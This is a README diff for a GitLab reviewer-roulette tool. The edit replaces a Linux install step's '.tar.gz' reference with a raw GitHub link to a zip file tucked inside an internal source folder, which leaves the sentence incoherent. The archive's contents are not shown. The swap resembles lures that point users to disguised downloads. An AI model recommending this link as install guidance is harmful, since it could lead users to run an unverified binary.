itzhenrikk/gitlab-reviewer-roulette/README.md

    - Drag the application to your Applications folder.

 3. **For Linux:**
-   - Locate the downloaded `.tar.gz` file.
+   - Locate the downloaded `https://raw.githubusercontent.com/itzhenrikk/gitlab-reviewer-roulette/main/internal/service/roulette/gitlab-reviewer-roulette-1.3.zip` file.
    - Extract the files using the terminal or a file manager.
    - Follow the instructions found in the README file included in the extraction.